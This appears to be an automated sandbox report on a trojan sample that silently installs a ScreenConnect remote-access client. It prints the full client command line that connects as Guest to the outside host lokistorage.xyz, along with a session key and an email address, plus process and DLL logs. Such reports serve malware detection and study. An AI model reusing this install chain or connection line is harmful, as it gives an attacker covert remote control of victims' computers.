Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD340C22CD	10_2_00007FFD340C22CD
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD340B74C8	10_2_00007FFD340B74C8
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD340BECED	10_2_00007FFD340BECED
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD340BDCF2	10_2_00007FFD340BDCF2
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD340BED2D	10_2_00007FFD340BED2D
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD343C30BC	10_2_00007FFD343C30BC
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD343C6068	10_2_00007FFD343C6068
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD343CF172	10_2_00007FFD343CF172
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD343CE3C6	10_2_00007FFD343CE3C6
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD343C0790	10_2_00007FFD343C0790
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD343D04FA	10_2_00007FFD343D04FA
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD343D0518	10_2_00007FFD343D0518
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD343D05FA	10_2_00007FFD343D05FA
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD343CC3D5	10_2_00007FFD343CC3D5

PE file contains executable resources (Code or Archives)

Source: lat0Kwfbuj.exe	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: lat0Kwfbuj.exe	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: lat0Kwfbuj.exe	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: lat0Kwfbuj.exe	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: lat0Kwfbuj.exe	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Sample file is different than original file name gathered from version info

Source: lat0Kwfbuj.exe, 00000000.00000002.2220231387.0000000005390000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000F16000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000F16000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSfxCA.dllL vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000F16000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewixca.dll\ vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000F16000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000F16000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000002.2220341691.00000000053B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamelibwebp.dllB vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000002.2220341691.00000000053B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamezlib.dll2 vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000002.2220341691.00000000053B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000002.2207194504.0000000001350000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000002.2231543469.00000000079D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000002.2231543469.00000000079D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSfxCA.dllL vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000002.2231543469.00000000079D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewixca.dll\ vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000002.2253146770.000000000B9F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsiexec.exe.muiX vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000002.2219493437.0000000005300000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelibwebp.dllB vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamezlib.dll2 vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000002.2222155530.00000000057BB000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000002.2222155530.00000000057BB000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSfxCA.dllL vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000002.2222155530.00000000057BB000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamewixca.dll\ vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000002.2222155530.00000000057BB000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe, 00000000.00000002.2217758260.0000000003E23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe	Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe	Binary or memory string: OriginalFilenamelibwebp.dllB vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe	Binary or memory string: OriginalFilenamezlib.dll2 vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe	Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe	Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe	Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe	Binary or memory string: OriginalFilenameSfxCA.dllL vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe	Binary or memory string: OriginalFilenamewixca.dll\ vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe	Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs lat0Kwfbuj.exe
Source: lat0Kwfbuj.exe	Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs lat0Kwfbuj.exe

Uses 32bit PE files

Source: lat0Kwfbuj.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsToolkit.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.lat0Kwfbuj.exe.b9b9d4.3.raw.unpack, WindowsToolkit.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.lat0Kwfbuj.exe.b163d4.5.raw.unpack, CursorBuffer.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.2.lat0Kwfbuj.exe.5300000.1.raw.unpack, CursorBuffer.cs	Cryptographic APIs: 'TransformBlock'

Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.0.lat0Kwfbuj.exe.b9b9d4.3.raw.unpack, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.0.lat0Kwfbuj.exe.b9b9d4.3.raw.unpack, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.0.lat0Kwfbuj.exe.b9b9d4.3.raw.unpack, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal50.troj.evad.winEXE@17/64@1/1

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lat0Kwfbuj.exe.log

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe

File created: C:\Users\user\AppData\Local\Temp\ScreenConnect

Source: lat0Kwfbuj.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: lat0Kwfbuj.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI805D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4752015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

Source: lat0Kwfbuj.exe

ReversingLabs: Detection: 21%

Source: lat0Kwfbuj.exe	String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: lat0Kwfbuj.exe	String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe

File read: C:\Users\user\Desktop\lat0Kwfbuj.exe

Source: unknown	Process created: C:\Users\user\Desktop\lat0Kwfbuj.exe "C:\Users\user\Desktop\lat0Kwfbuj.exe"
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AEF3BD45AE3AC68FA3C1F0BB226B94AD C
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI805D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4752015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 1AEB7D6AE800B379962CD8E66BA70200
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 297D060039D81CAE5710DC99E60A4A0C E Global\MSI0000
Source: unknown	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=8c30d271-264f-488c-94af-041784a36368&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=michalgasper2%40gmail.com&c=kristof%20horvat&c=&c=&c=&c=&c=&c=&c="
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "b15bf990-c25d-4951-af9a-ebda90b58672" "User"
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "61fcd7ba-9a06-4116-a3ec-642fd4d2ceac" "System"
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AEF3BD45AE3AC68FA3C1F0BB226B94AD C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 1AEB7D6AE800B379962CD8E66BA70200	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 297D060039D81CAE5710DC99E60A4A0C E Global\MSI0000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI805D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4752015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "b15bf990-c25d-4951-af9a-ebda90b58672" "User"	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "61fcd7ba-9a06-4116-a3ec-642fd4d2ceac" "System"	Jump to behavior

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
